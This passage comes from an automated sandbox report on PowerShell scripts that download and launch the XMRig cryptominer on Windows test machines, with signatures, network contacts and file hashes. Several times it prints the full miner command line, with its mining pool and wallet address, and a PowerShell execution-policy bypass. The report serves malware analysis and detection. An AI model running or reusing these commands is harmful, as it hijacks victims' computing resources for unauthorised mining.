memory/4344-96-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-97-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-98-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-99-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-100-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-101-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-102-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-103-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-104-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-105-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-106-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-107-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-108-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-109-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-110-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-111-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-112-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-113-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-114-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-115-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-116-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-117-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-118-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-119-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-120-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-121-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-122-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-123-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-124-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-125-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-126-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-127-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-128-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-129-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-130-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-131-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-132-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-133-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-134-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-135-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-136-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-137-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-138-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-139-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-140-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-141-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-142-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-143-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-144-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-145-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-146-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-147-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-148-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-149-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-150-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-151-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-152-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-153-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-154-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-155-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
Analysis: behavioral26
Detonation Overview
| Field | Value |
| Submitted | 2024-05-27 00:27 |
| Reported | 2024-05-27 01:43 |
| Platform | win10-20240404-en |
| Max time kernel | 1799s |
| Max time network | 1777s |
| Command Line | N/A |
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| 64 matches; the report renders no description, indicator, process or target for any of them | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3104 wrote to memory of 652 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3104 wrote to memory of 652 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.71.105.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
memory/3104-4-0x00007FFEBBF73000-0x00007FFEBBF74000-memory.dmp
memory/3104-5-0x0000029A40270000-0x0000029A40292000-memory.dmp
memory/3104-6-0x00007FFEBBF70000-0x00007FFEBC95C000-memory.dmp
memory/3104-10-0x00007FFEBBF70000-0x00007FFEBC95C000-memory.dmp
memory/3104-9-0x0000029A40420000-0x0000029A40496000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rw2stgp0.spb.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3104-25-0x00007FFEBBF70000-0x00007FFEBC95C000-memory.dmp
memory/3104-48-0x0000029A408D0000-0x0000029A408E2000-memory.dmp
memory/3104-61-0x0000029A403E0000-0x0000029A403EA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral29
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:49
Platform
win7-20240221-en
Max time kernel
1566s
Max time network
1573s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
Network
Files
Analysis: behavioral30
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:50
Platform
win10-20240404-en
Max time kernel
1792s
Max time network
1761s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3188 wrote to memory of 4936 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3188 wrote to memory of 4936 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4vczwur0.rwc.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3188-25-0x00007FFF04D80000-0x00007FFF0576C000-memory.dmp
memory/3188-48-0x000001FDC5690000-0x000001FDC56A2000-memory.dmp
memory/3188-61-0x000001FDAD280000-0x000001FDAD28A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral32
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:56
Platform
win11-20240426-en
Max time kernel
1792s
Max time network
1750s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3036 wrote to memory of 2200 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3036 wrote to memory of 2200 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
memory/3036-0-0x00007FFA379F3000-0x00007FFA379F5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_slv5poqe.and.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral6
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:24
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1782s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 408 wrote to memory of 3636 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 408 wrote to memory of 3636 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.80.50.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oc0itvdp.0sl.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/408-25-0x00007FFAC0A40000-0x00007FFAC0C1B000-memory.dmp
memory/408-48-0x0000029910D10000-0x0000029910D22000-memory.dmp
memory/408-61-0x0000029910CD0000-0x0000029910CDA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3636-90-0x000001A6733E0000-0x000001A673400000-memory.dmp
memory/3636-91-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/408-92-0x00007FFAC0A40000-0x00007FFAC0C1B000-memory.dmp
memory/3636-93-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/408-94-0x00007FFAC0A40000-0x00007FFAC0C1B000-memory.dmp
memory/408-95-0x00007FFAC0A40000-0x00007FFAC0C1B000-memory.dmp
memory/3636-96-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-{97..155}-0x00007FF787550000-0x00007FF788183000-memory.dmp (59 further dumps of the same region, one per index)
memory/3636-156-0x00007FF787550000-0x00007FF788183000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:24
Platform
win10v2004-20240508-en
Max time kernel
1795s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| 64 matches, no indicator detail recorded | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1504 wrote to memory of 1932 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1504 wrote to memory of 1932 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4456,i,2607710392823067546,4648797561512801463,262144 --variations-seed-version --mojo-platform-channel-handle=1300 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3804,i,2607710392823067546,4648797561512801463,262144 --variations-seed-version --mojo-platform-channel-handle=4276 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
